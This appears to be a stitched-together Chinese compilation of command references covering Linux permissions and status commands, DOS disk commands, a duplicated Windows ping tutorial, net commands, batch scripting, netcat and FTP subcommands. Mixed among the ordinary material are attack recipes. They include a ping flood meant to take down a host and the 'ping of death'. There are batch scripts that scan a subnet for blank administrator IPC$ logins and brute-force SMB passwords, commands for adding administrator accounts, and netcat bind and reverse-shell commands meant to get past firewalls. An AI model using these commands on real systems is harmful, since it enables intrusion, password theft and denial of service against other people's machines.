http://baike.baidu.com/view/283786.htm

http://baike.baidu.com/view/7911.htm

http://baike.baidu.com/view/2158185.htm

http://tieba.baidu.com/f?kz=142413017

2. 数字设定法
　　我们必须首先了解用数字表示的属性的含义：0表示没有权限，1表示可执行权限(x)，2表示可写权限(w)，4表示可读权限(r)，然后将其相加。所以数字属性的格式应为3个从0到7的八进制数，其顺序是（u）（g）（o）。
　　例如，如果想让某个文件的属主有“读/写”二种权限，需要把4（可读）+2（可写）＝6（读/写）。
　　数字设定法的一般形式为：
　　chmod [mode] 文件名
例如：chmod 777 aa（给aa赋予属主、同组用户、其它用户都拥有全部权限）
27.chown 命令
　　功能：更改某个文件或目录的属主和属组。这个命令也很常用。例如root用户把自己的一个文件拷贝给用户xu，为了让用户xu能够存取这个文件，root用户应该把这个文件的属主设为xu，否则，用户xu无法存取这个文件。
　　语法：chown [选项] 用户或组 文件 
选项含义如下：
　　- R 递归式地改变指定目录及其下的所有子目录和文件的拥有者。
　　- v 显示chown命令所做的工作。
例如：chown -R root:root doc （将doc文件的所属组改为root，属主用户改为root）
八、系统状态类命令
28.dmesg命令
功能：显示引导时内核显示的状态信息
#dmesg |grep -4 “eth0”显示状态信息中与eth0相关的前后4行内容
29.uname命令
功能：显示当前的系统信息
#uname –a
30.uptime命令
功能：显示当前时间，自从上次重新引导之后系统运行的时间，服务器和多少用户链接以及系统前1、5、15分钟的负载信息。
31.who命令
功能：显示当前登录在系统上的用户信息。
-r:查看系统运行等级
-w，在登录帐号后面显示一个字符来表示用户的信息状态：
+：允许写信息； -：不允许写信息； ?：不能找到终端设备
32.w命令
功能：查看其他登录的用户（who增强版）
第一行输出内容：当前时间，系统启动到现在的时间，登录用户的数目，系统在最近1秒、5秒和15秒的平均负载 
第二行输出内容：登录帐号、终端名称、远程主机名、登录时间、空闲时间、JCPU、PCPU、当前正在运行进程的命令行。
*JCPU时间指的是和该终端（tty）连接的所有进程占用的时间 
*PCPU时间则是指当前进程（即在WHAT项中显示的进程）所占用的时间
33.whoami命令
功能：显示当前用户名
34.hostname命令
功能：显示系统的主机名
35.cal [月份] [年份] 命令
功能：显示日历
36.bc命令
功能：计算器，使用quit退出
37.date命令
功能：显示或修改日期时间。
38.free命令
功能：查看当前内存和交换空间的使用情况
九．网络类命令
39.write命令
功能：向另外一个用户发信息，以Ctrl+D作为结束，普通用户发信息受到mesg状态影响。
语法：write <用户名>
40.wall命令
功能：向所有用户广播信息，普通用户受到mesg状态影响。
语法：wall [message]
41.mesg命令
功能：显示或设置是否接受其他用户发来的信息。
语法：mesg [参数]
[参数]
y:接受从其他用户发来的信息
n：不接受从其他用户发来的信息
#mesg
显示当前是否接受其他用户发来的信息
42.ping命令
功能：通过检查网络中其他主机的应答信息，来确认网络的连通性。
语法：ping [参数] 主机名（或ip地址）
参数：
-c count：共发出count次信息。
-R：显示路由表的详细信息
43.telnet命令
功能：远程登录
语法：telnet [<主机名>][：端口号]
44.ifconfig命令


（2）选用＞PRN参数时，则把所列目录及目录中的文件名打印输出。
（七）DELTREE——删除整个目录命令
1．功能：将整个目录及其下属子目录和文件删除。
2．类型：外部命令
3．格式：DELTREE[盘符：]〈路径名〉
4．使用说明：该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除，而且不管文件的属性为隐藏、系统或只读，只要该文件位于删除的目录之下，DELTREE都一视同仁，照删不误。使用时务必小心！！！
五、磁盘操作类命令
（一）formAT——磁盘格式化命令
1．功能：对磁盘进行格式化，划分磁道和扇区；同时检查出整个磁盘上有无带缺陷的磁道，对坏道加注标记；建立目录区和文件分配表，使磁盘作好接收DOS的准备。
2．类型：外部命令
3．格式：formAT〈盘符：〉[/S][/4][/Q]
4．使用说明：
（1）命令后的盘符不可缺省，若对硬盘进行格式化，则会如下列提示：WARNING:ALL DATA ON NON
——REMOVABLE DISK
DRIVE C:WILL BE LOST ！
Proceed with format (Y/N)？
（警告：所有数据在C盘上，将会丢失，确实要继续格式化吗？）
（2）若是对软盘进行格式化，则会如下提示：Insert mew diskette for drive A;
and press ENTER when ready…
（在A驱中插入新盘，准备好后按回车键）。
（3）选用[/S]参数，将把DOS系统文件IO.SYS
、MSDOS.SYS及COMMAND.COM复制到磁盘上，使该磁盘可以做为DOS启动盘。若不选用/S参数，则格式化后的磙盘只能读写信息，而不能做为启动盘；
（4）选用[/4]参数，在1.2MB的高密度软驱中格式化360KB的低密度盘；
（5）选用[/Q]参数，快速格式化，这个参数并不会重新划分磁盘的磁道貌岸然和扇区，只能将磁盘根目录、文件分配表以及引导扇区清成空白，因此，格式化的速度较快。
（6）选用[/U]参数，表示无条件格式化，即破坏原来磁盘上所有数据。不加/U，则为安全格式化，这时先建立一个镜象文件保存原来的FAT表和根目录，必要时可用UNFORRMAT恢复原来的数据。
（二）UNformAT恢复格式化命令
1．功能：对进行过格式化误操作丢失数据的磁盘进行恢复。
2．类型：外部命令
3．格式：UNformAT〈盘符〉[/L][/U][/P][/TEST]
4．使用说明：用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区（包括FAT、根目录、BOOT扇区及硬盘分区表）受损时，也可以用UNformAT来抢救。
（1）选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息，但不会真的做formAT工作。
（2）选用/P参数将显示于屏幕的报告（包含/L参数所产生的信息）同时也送到打印机。运行时屏幕会显示：“Print out will
be sent to LPT1”
（3）选用/TEST参数只做模拟试验（TEST）不做真正的写入动作。使用此参数屏幕会显示：“Simulation only”
（4）选用/U参数不使用MIRROR映像文件的数据，直接根据磁盘现状进行UNformAT。
（5）选用/PSRTN；修复硬盘分区表。
若在盘符之后加上/P、/L、/TEST之一，都相当于使用了/U参数，UNformAT会“假设”此时磁盘没有MIRROR映像文件。
注意：UNformAT对于刚formAT的磁盘，可以完全恢复，但formAT后若做了其它数据的写入，则UNformAT就不能完整的救回数据了。UNformAT并非是万能的，由于使用UNformAT会重建FAT与根目录，所以它也具有较高的危险性，操作不当可能会扩大损失，如果仅误删了几个文件或子目录，只需要利用UNDELETE就够了。
三） CHKDSK——检查磁盘当前状态命令


    1功能：显示当前内存使用的情况
    2类型：外部命令
    3格式：MEM[/C][/F][/M][/P]
    4使用说明：
    （1）选用/C参数列出装入常规内存和CMB的各文件的长度，同时也显示内存空间的使用状况和最大的可用空间；
    （2）选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小；  
    （3）选用/M参数显示该模块使用内存地地址、大小及模块性质；
    （4）选用/P参数指定当输出超过一屏时，暂停供用户查看。
    （六） MSD显示系统信息命令
    1功能：显示系统的硬件和操作系统的状况。
    2类型：外部命令
    3格式：MSD[/I][/B][/S]
    4使用说明：
    （1）选用/I参数时，不检测硬件；
    （2）选用/B参数时，以黑白方式启动MSD；
    （3）选用/S参数时，显示出简明的系统报告。
ping命令详解
对于Windows下ping命令相信大家已经再熟悉不过了，但是能把ping的功能发挥到最大的人却并不是很多，当然我也并不是说我可以让ping发挥最大的功能，我也只不过经常用ping这个工具，也总结了一些小经验，现在和大家分享一下。 
现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧，ping只有在安装了TCP/IP协议以后才可以使用： 
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-wz timeout] destination-list 
Options: 
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C. 
不停的ping地方主机，直到你按下Control-C。 
此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。 
-a Resolve addresses to hostnames. 
解析计算机NetBios名。 
示例：C:＼>ping -a 192.168.1.21 
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data: 
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 
Ping statistics for 192.168.1.21: 
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: 
Minimum = 0ms, Maximum = 0ms, Average = 0ms 
从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。 


-n count Number of echo requests to send. 
发送count指定的Echo数据包数。 
在默认情况下，一般都只发送四个数据包，通过这个命令可以自己定义发送的个数，对衡量网络速度很有帮助，比如我想测试发送50个数据包的返回的平均时间为多少，最快时间为多少，最慢时间为多少就可以通过以下获知： 
C:＼>ping -n 50 202.103.96.68 
Pinging 202.103.96.68 with 32 bytes of data: 
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 
Request timed out. 
……………… 
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 
Ping statistics for 202.103.96.68: 
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds: 
Minimum = 40ms, Maximum = 51ms, Average = 46ms 
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速度为46ms。 
-l size Send buffer size. 
定义echo数据包大小。 
在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到65500byt，因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对方一次发送的数据包大于或等于65532时，对方就很有可能挡机，所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击性的命令：（以下介绍带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负） 
C:＼>ping -l 65500 -t 192.168.1.21 
Pinging 192.168.1.21 with 65500 bytes of data: 
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 
……………… 
这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包，如果你只有一台计算机也许没有什么效果，但如果有很多计算机那么就可以使对方完全瘫痪，我曾经就做过这样的试验，当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时，不到5分钟对方的网络就已经完全瘫痪，网络严重堵塞，HTTP和FTP服务完全停止，由此可见威力非同小可。 
-f Set Don't Fragment flag in packet. 
在数据包中发送“不要分段”标志。 
在一般你所发送的数据包都会通过路由分段再发送给对方，加上此参数以后路由就不会再分段处理。 


[HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Services＼Tcpip＼Parameters] 
"DefaultTTL"=dword:000000ff 
255---FF 
　 128---80 
　 64----40 
　 32----20 
好了，ping命令也基本上完全讲解完了，其中还有-j,-k参数我还没有详细说明，由于某些原因也包括我自己所收集的资料过少这里也没有向大家详细介绍，请大家见谅，如果在看了这篇文章的朋友当中有知道得比我更多的，以及其他使用技巧的也希望您能告诉我，并在此先谢过。 
对于Windows下ping命令相信大家已经再熟悉不过了，但是能把ping的功能发挥到最大的人却并不是很多，当然我也并不是说我可以让ping发挥最大的功能，我也只不过经常用ping这个工具，也总结了一些小经验，现在和大家分享一下。 
现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧，ping只有在安装了TCP/IP协议以后才可以使用： 
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list 
Options: 
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C. 
不停的ping地方主机，直到你按下Control-C。 
此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。 
-a Resolve addresses to hostnames. 
解析计算机NetBios名。 
示例：C:＼>ping -a 192.168.1.21 
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data: 
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 
Ping statistics for 192.168.1.21: 
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: 
Minimum = 0ms, Maximum = 0ms, Average = 0ms 
从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。 
-n count Number of echo requests to send. 
发送count指定的Echo数据包数。 
在默认情况下，一般都只发送四个数据包，通过这个命令可以自己定义发送的个数，对衡量网络速度很有帮助，比如我想测试发送50个数据包的返回的平均时间为多少，最快时间为多少，最慢时间为多少就可以通过以下获知： 
C:＼>ping -n 50 202.103.96.68 
Pinging 202.103.96.68 with 32 bytes of data: 
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 


Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 
Request timed out. 
……………… 
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 
Ping statistics for 202.103.96.68: 
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds: 
Minimum = 40ms, Maximum = 51ms, Average = 46ms 
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速度为46ms。 
-l size Send buffer size. 
定义echo数据包大小。 
在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到65500byt，因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对方一次发送的数据包大于或等于65532时，对方就很有可能挡机，所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击性的命令：（以下介绍带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负） 
C:＼>ping -l 65500 -t 192.168.1.21 
Pinging 192.168.1.21 with 65500 bytes of data: 
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 
……………… 
这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包，如果你只有一台计算机也许没有什么效果，但如果有很多计算机那么就可以使对方完全瘫痪，我曾经就做过这样的试验，当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时，不到5分钟对方的网络就已经完全瘫痪，网络严重堵塞，HTTP和FTP服务完全停止，由此可见威力非同小可。 
-f Set Don't Fragment flag in packet. 
在数据包中发送“不要分段”标志。 
在一般你所发送的数据包都会通过路由分段再发送给对方，加上此参数以后路由就不会再分段处理。 
-i TTL Time To Live. 
指定TTL值在对方的系统里停留的时间。 
此参数同样是帮助你检查网络运转情况的。 
-v TOS Type Of Service. 
将“服务类型”字段设置为 tos 指定的值。 
-r count Record route for count hops. 
在“记录路由”字段中记录传出和返回数据包的路由。 
在一般情况下你发送的数据包是通过一个个路由才到达对方的，但到底是经过了哪些路由呢？通过此参数就可以设定你想探测经过的路由的个数，不过限制在了9个，也就是说你只能跟踪到9个路由，如果想探测更多，可以通过其他命令实现，我将在以后的文章中给大家讲解。以下为示例： 


net use \\ip\ipc$ " " /user:" " 建立IPC空链接 
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: 
net use h: \\ip\c$ 登陆后映射对方C：到本地为H: 
net use \\ip\ipc$ /del 删除IPC链接 
net use h: /del 删除映射对方到本地的为H:的映射 
net user 用户名　密码　/add 建立用户 
net user guest /active:yes 激活guest用户 
net user 查看有哪些用户 
net user 帐户名 查看帐户的属性 
net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 
net start 查看开启了哪些服务 
net start 服务名　 开启服务；(如:net start telnet， net start schedule) 
net stop 服务名 停止某服务 
net time \\目标ip 查看对方时间 
net time \\目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息 
net view 查看本地局域网内开启了哪些共享 
net view \\ip 查看对方局域网内开启了哪些共享 
net config 显示系统网络设置 
net logoff 断开连接的共享 
net pause 服务名 暂停某服务 
net send ip "文本信息" 向对方发信息 
net ver 局域网内正在使用的网络连接类型和信息 
net share 查看本地开启的共享 
net share ipc$ 开启ipc$共享 
net share ipc$ /del 删除ipc$共享 
net share c$ /del 删除C：共享 
net user guest 12345 用guest用户登陆后用将密码改为12345 
net password 密码 更改系统登陆密码 
netstat -a 查看开启了哪些端口,常用netstat -an 
netstat -n 查看端口的网络连接情况，常用netstat -an 
netstat -v 查看正在进行的工作 
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） 
netstat -s 查看正在使用的所有协议使用情况 
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数："-w数字"用于设置超时间隔。 
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数："-l[空格]数据包大小"；"-n发送数据次数"；"-t"指一直ping。 
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 


参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到取完为止{ (set)为文件时，如(d:\pass.txt)时 }。 
用法举例： 
@echo off 
echo 用法格式：test.bat *.*.* > test.txt 
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt 
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。 
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 
@echo off 
echo 用法格式：ok.bat ip 
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。 
#7 七： 
2：if命令及变量 基本格式： 
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为"真"。 
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。 
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。 
例："if "%2%"=="4" goto start"指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） 
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。 
例："if not nc.exe goto end"指：如果没有发现nc.exe文件就跳到":end"标签处。 
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如："if exist test.txt. else echo test.txt.missing "，注意命令中的"." 


（二）系统外部命令(均需下载相关工具)： 
1、瑞士军刀：nc.exe 
参数说明： 
-h 查看帮助信息 
-d 后台模式 
-e prog程序重定向，一但连接就执行〔危险〕 
-i secs延时的间隔 
-l 监听模式，用于入站连接 
-L 监听模式，连接天闭后仍然继续监听，直到CTR+C 
-n IP地址，不能用域名 
-o film记录16进制的传输 
-p[空格]端口 本地端口号 
-r 随机本地及远程端口 
-t 使用Telnet交互方式 
-u UDP模式 
-v 详细输出，用-vv将更详细 
-w数字 timeout延时间隔 
-z 将输入，输出关掉（用于扫锚时） 
基本用法： 
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 
nc -l -p 80 开启本机的TCP 80端口并监听 
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 
高级用法： 
nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止 
nc -L -p 80 > c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt 
nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用 
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 
本机上用：nc -l -p 本机端口 
在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K 
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 
本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称 
在对方主机上用：nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机 
备 注： 
| 管道命令 
< 或 > 重定向命令。"<"，例如：tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令 
＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt >> d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中 
>与>>的区别 　">"指：覆盖；">>"指：保存到(添加到）。 
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。 


32.mkdir dir-name：在远程主机中建一目录。 
33.mls remote-file local-file：同nlist，但可指定多个文件名。 
34.mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。 
35.modtime file-name：显示远程主机文件的最后修改时间。 
36.mput local-file：将多个文件传输至远程主机。 
37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。 
38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。 
39.nmap[inpattern outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。 
40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。 
41.open host[port]：建立指定ftp服务器连接，可指定连接端口。 
42.passive：进入被动传输方式。 
43.prompt：设置多个文件传输时的交互提示。 
44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。 
45.put local-file[remote-file]：将本地文件local-file传送至远程主机。 
46.pwd：显示远程主机的当前工作目录。 
47.quit：同bye，退出ftp会话。 
48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst. 
49.recv remote-file[local-file]：同get。 
50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。 
51.rhelp[cmd-name]：请求获得远程主机的帮助。 
52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。 
53.rename[from][to]：更改远程主机文件名。 
54.reset：清除回答队列。 
55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。 
56.rmdir dir-name：删除远程主机目录。 
57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。 
58.send local-file[remote-file]：同put。 
59.sendport：设置PORT命令的使用。 
60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。 
61.size file-name：显示远程主机文件大小，如：site idle 7200。 
62.status：显示当前ftp状态。 
63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。 
64.sunique：将远程主机文件名存储设置为只一(与runique对应)。 
65.system：显示远程主机的操作系统类型。 
66.tenex：将文件传输类型设置为TENEX机的所需的类型。 
67.tick：设置传输时的字节计数器。 
68.trace：设置包跟踪。 
69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。 
70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3